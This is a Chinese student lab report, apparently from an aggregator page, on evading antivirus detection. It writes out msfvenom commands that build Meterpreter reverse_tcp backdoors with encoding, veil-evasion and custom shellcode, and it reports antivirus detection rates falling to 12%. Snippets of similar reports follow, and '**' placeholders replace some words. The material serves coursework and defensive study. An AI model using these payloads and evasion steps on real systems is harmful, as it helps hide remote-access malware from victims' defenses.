基於特徵碼的檢測
再就是根據該**是否有惡意行為來判別,若有惡意的行為,我們就認為該**是惡意**。
(2)免殺是做什麼?
通過改變惡意程式的明顯特徵等資訊已達到避免被防毒軟體查殺的技術。
(3)免殺的基本方法有哪些?
改變特徵碼
對惡意**進行加殼,或用其他語言(如veil-evasion)或編譯器進行再編譯,利用shellcode進行編碼。
通過這次實驗,我掌握了非常簡單的避免查殺的方法,雖然這只是基本的攻擊手段,但也讓我發現我的qq管家也不是完全靠得住的。要想避免被攻擊,還是得先了解如何生成攻擊。
例如在實戰中如何在靶機上注入後門程式並執行等,因為本次實驗室靶機主動接受我們傳送的後門,所以應該再學習如何主動把後門注入到靶機裡的技術。
已知 windows ip為:192.168.1.112 kali ip為:192.168.1.118
使用msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.106 port=5322 -f exe > test.exe命令生成meterpreter可執行檔案test.exe
使用ncat將檔案傳輸到windows主機之後,上這個**檢測一下有多少查毒軟體可以將其查殺出來
掃瞄結果:53%的殺軟(21/39)報告發現病毒
使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b 『\x00』 lhost=192.168.1.106 port=5322 -f exe > test1.exe命令生成編碼過的可執行檔案test1.exe,編碼一次
使用ncat將檔案傳輸到windows主機後,再檢測:
掃瞄結果:56%的殺軟(22/39)報告發現病毒
編碼十次
使用ncat將檔案傳輸到windows主機後檢測:
掃瞄結果:56%的殺軟(22/39)報告發現病毒
由此可得對於編碼這種免殺方法一般的防毒軟體都是可以防住的。
在kali中開啟veil-evasion:直接在輸入veil-evasion
然後在menu裡面輸入以下命令來生成可執行檔案:
檢測如下:
掃瞄結果:25%的殺軟(10/39)報告發現病毒,有些殺軟已經開始靠不住了。
使用msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.118 lport=5322 -f c命令生成乙個c語言shellcode陣列
利用這個陣列在windows主機的vs平台下寫shellcode
在kali下使用msf監聽,執行剛剛編譯生成的可執行檔案,成功獲取許可權。
用我的qq管家查殺:
很好·····殺不出來····
去**試試
掃瞄結果:12%的殺軟(5/39)報告發現病毒。更少了···反正qq管家是靠不住了···
20145309《網路對抗技術》免殺原理與實踐
20145309 網路對抗技術 免殺原理與實踐 1.基礎問題回答 1 殺軟是如何檢測出惡意 的?根據特徵來檢測 對已存在的流行 特徵的提取與比對 根據行為來檢測 是否有更改登錄檔行為 是否有設定自啟動 是否有修改許可權等等 2 免殺是做什麼?使用一些方法使得惡意程式不被殺軟和防火牆發現,避免被查殺。...
20145228《網路對抗技術》免殺原理與實踐
理解免殺技術原理 正確使用msf編碼器,veil evasion,自己利用shellcode程式設計等免殺工具或技巧 1 殺軟是如何檢測出惡意 的?1 惡意 一般具有明顯的特徵碼,依據特徵碼來判斷是否是惡意 2 如果乙個程式的行為是帶有惡意的行為,也會被檢測為惡意 2 免殺是做什麼?免殺就是避免殺軟...
2015511《網路對抗》網路欺詐技術防範
ping通kali和靶機 因為之後用apache會用到80埠,所以先檢視80埠是否被占用,netstat tupln grep 80,如果有可以用kill 程序號殺死這兩個程序,再次檢視80埠占用情況,沒有被占用的程序 用vi開啟 etc apache2 ports.conf,檢視配置檔案中的監聽埠...